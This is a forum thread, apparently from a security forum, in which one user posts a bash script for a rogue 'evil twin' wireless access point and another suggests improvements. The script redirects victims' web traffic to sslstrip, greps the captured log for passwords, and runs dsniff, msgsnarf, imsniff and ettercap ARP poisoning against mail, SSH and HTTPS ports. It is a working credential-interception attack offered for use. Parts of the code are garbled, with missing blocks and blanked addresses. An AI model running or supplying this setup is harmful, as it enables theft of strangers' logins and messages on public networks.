Results 1 to 2 of 2

Thread: Soft AP bash script

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Mar 2010

    Default Soft AP bash script

    Hey guys

    I was getting tired of typing all the command in constantly so I made a litle bash script for it, it is made for Ubuntu so a few changes will be needed, for example BT uses dhpcd in stead of dhcpd3

    Now the problem, a lot of the time the other computers don't see the wireless when applied to interface mon or so.

    ### edit ###
    Found the problem only occurs with Windows XP

    now the only thing that doesn't work (yet?) is the dns service, the victim can't resolve the dns name but can access IP address directly

    Anyone here who has more expirence with the softAP's and is willing to help me???

    # SoftAP for wireless-testing
    # Modded by Junke1990
    # Hardware: Eee PC 1000h 
    # NICs
    #  eth0 	(LAN)  
    #  ra0 		(WLAN)		rt2860STA
    #  wlan1 	(USB WLAN)	RTL8170L	# dealextreme sku.27963 
    # init
    # services to listen on
    # Make sure only root can run our script
    if [[ $EUID -ne 0 ]]; then
      echo "This script must be run as root" 1>&2
      exit 1
    modprobe tun
    sleep 1
    echo "[>] Starting: Soft AP - Junke1990"
    # get interface and mac list
    i=0 iflist=() maclist=()
    while read -r if mac; do 
    done < <(ifconfig -a | awk '/^[^ ]/ && $1 != "lo" {print $1,$5}')
    for i in "${!iflist[@]}"; do
      echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
    echo -n "[?] Select your inet conn. [#] "
    read j
    # select SoftAP adapter
    for i in "${!iflist[@]}"; do
      if [ $j != $i ]; then
        echo "$i: interface ${iflist[i]}, mac: ${maclist[i]}"
    echo -n "[?] Select your SoftAP adapter. [#] "
    read j
    # MAC address
    echo "[+] Gathering network info..."
    # info inet conn
    intI_IP=`ifconfig $intI | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`
    intI_DNS=`cat /etc/resolv.conf | sed -n "2 p" | awk '{ print $2}'`
    intI_gw=`route -n | awk '{ print $2}' | grep -v '' | sed -n "3 p"`
    intI_mask=`ifconfig $intI | grep 'Mask:' | grep -v '' | awk '{ print $4}' | cut -d: -f2`
    intI_netw=`route -n | grep $intI_mask | cut -d' ' -f1 | head -n 1`
    # converting netmask in to netmask length
    echo "[+] Calc'ing network mask..."
    MASK1=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\1/'`
    MASK2=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\2/'`
    MASK3=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\3/'`
    MASK4=`echo ${NETMASK} | sed 's/\(.*\)\.\(.*\)\.\(.*\)\.\(.*\)/\4/'`
    BM1=`echo -e "obase=2; ${MASK1}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
    BM2=`echo -e "obase=2; ${MASK2}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
    BM3=`echo -e "obase=2; ${MASK3}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
    BM4=`echo -e "obase=2; ${MASK4}" | bc |sed 's/0.*$//' |tr -d "\n" | wc -m`
    MASK=$(( BM1 + BM2 + BM3 + BM4))
    # enter wireless essid name
    echo -n "[?] Enter the desired name for wireless network: "; read ssid
    # prepare interface / softap
    #wlanconfig $intAP destroy
    #wlanconfig $intAP create wlanmode mon wlandev wifi0
    if [ `echo $intAP || grep 'mon' ` ]; then
     intAP=`airmon-ng start $intAP |grep "monitor mode " | awk '{ print $5 }' |sed 's/)//'`;
    echo "[+] Setting up fake AP...";
    sleep 1;
    xterm -geometry 75x15 -e airbase-ng -W 1 -w "1234567890" -c 6 -e "$ssid" -a $intAP_MAC $intAP &
    sleep 1;
    ifconfig at0 up
    ifconfig at0 netmask
    ifconfig at0 mtu 1500
    route add -net $intI_netw netmask $intI_mask gw $intI_gw
    route add -net netmask gw
    # monitor
    #xterm -e airodump-ng -c 6 --bssid $intAP_MAC $intAP &
    #xterm -e tshark -i 3 "not broadcast and not multicast" & # at0 = 3
    echo "[+] Killing dhcpd and dnsmasq..."
    # do this quiet for when the process isn't running
    killall -q dhcpd3
    killall -q dnsmasq
    echo "[+] Setting up DHCP config..."
    # create custom dhcpd.conf for WLAN
    cat > dhcpd.conf << EOF
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet netmask {
    option subnet-mask;
    option broadcast-address;
    option routers;
    option domain-name-servers;
    option domain-name-servers;
    option domain-name-servers;
    echo "[+] Cleaning up IP tables..."
    # iptables cleanup
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo "[+] Setting up forwarding tables..."
    # iptables
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $intI_gw # all udp traffic
    #iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $intI_DNS # DNS only
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080  # send stuff to sslstrip
    iptables -A FORWARD --in-interface at0 -j ACCEPT # rogue gateway
    iptables -t nat -A POSTROUTING --out-interface $intI -j MASQUERADE # gateway to ext. router
    #iptables -t nat -A PREROUTING -s -d $intI_netw/$intI_mask_nb -j DROP # protect LAN from WLAN
    # ip fwd enable 
    echo 1 > /proc/sys/net/ipv4/ip_forward
    # start dhcp server for subnet
    # edit /etc/apparmor.d/usr.sbin.dhcp3 to allow dhcpd to read the config file if it keeps giving permission denied
    echo "[+] Setting up DHCP server..."
    xterm -geometry 75x10 -T DHCP -e dhcpd3 -d -f -cf dhcpd.conf -pf /var/run/dhcp3-server/ at0 &
    # restart dnsmasq
    echo "[+] Setting up dnsmasq..."
    ### python-twisted-web2 required!!!
    if [ -f $sslstrip ]; then
      echo "[+] Setting up sslstrip..."
      xterm -geometry 45x5 -e python $sslstrip -a -k -f -l 8080 &
      xterm -e tail -f sslstrip.log &
      xterm -e "tail -f sslstrip.log |grep 'pass' "&
      sleep 1
      echo "[-] SSLStrip not found..."
      echo 'Edit $sslstrip to the correct path.'
    # DSniff
    if [ $dsn == 1 ]; then 
      if which dsniff >/dev/null; then
        echo "[+] Setting up dsniff..."
        xterm -e dsniff -i at0 -m &   
        sleep 1
      echo "[-] DSniff not started..."
    # IMSniff - MSN only
    if [ $ims == 1 ]; then 
      if which imsniff >/dev/null; then
        if [ ! -d 'IMlog' ]; then
          mkdir IMlog
        # gives a lot of unknown content err's
        xterm -e "imsniff -cd IMlog at0 |grep -i -v 'unknown'"& 
        sleep 1
      echo "[-] IMSniff not started..."
    # MSGSnarf - AOL, ICQ, IRC, MSN, Yahoo
    if [ $msg == 1 ]; then 
      if which msgsnarf >/dev/null; then
        echo "[+] Setting up msgsnarf..."
        xterm -e msgsnarf -i at0 &    
        sleep 1
      echo "[-] MSGSnarf not started..."
    # ettercap TCP Ports
    # IMAP  - 143/TCP 220/TCP (IMAP3) 993/TCP (IMAPS)
    # POP3  - 110/TCP 995/TCP
    # SMTP  - 25/TCP 465/TCP
    # SSL   - 443/TCP
    # HTTP  - 80/TCP
    # SSH   - 22/TCP
    # MSN   - 1863/TCP
    # Yahoo - 5050/TCP - nobody interesting uses yahoo...
    # ICQ   - 5190/TCP - nobody at all uses ICQ xD
    sleep 1
    echo "[+] Setting up ettercap..."
    xterm -e ettercap -T -i at0 -P autoadd -l ettercap -w ettercap.pcap -M arp / /,25,80,110,143,220,443,465,993,995,1863 &
    sleep 1
    # ip_forward
    # as last to avoid reset
    echo "[+] Enabling IP forward..."
    echo "1" > /proc/sys/net/ipv4/ip_forward
    chk=`cat /proc/sys/net/ipv4/ip_forward`
    if [ $chk != "1" ]; then
      echo "Can't enable ip_forward"
    echo "[x] All done! have fun!"

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010


    First off I`m working on a similar script. Not just for an evil AP but also for some other wireless stuff. Search for "ubitack" on google code.

    Regarding your DNS issue.
    I`m not using dnsmasq. Instead I`m using the DNS server my system uses anyways. This is, inspired by one of Darkoperator`s scripts, my way to generate the dhcpd.conf

    for d in $(cat /etc/resolv.conf | sed -r 's/^.* ([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}).*$/\1/' | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
          echo "option domain-name-servers $d;" >> $DHCPDCONF
    A question regarding ettercap. You are using ARP poisoning. IMHO you don`t need to ARP poison as you are already in control of the traffic. You have your kernel forwarding packets. I`m using ettercap with the evil AP in none offensive mode.

    ettercap -T -q -p -u -z -m ${LOGFOLDER}ettercap_evilap.log -i $wint >> $LOGFILE 2>&1
    A last question, why aren't you using airbase-ng for your evil AP?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts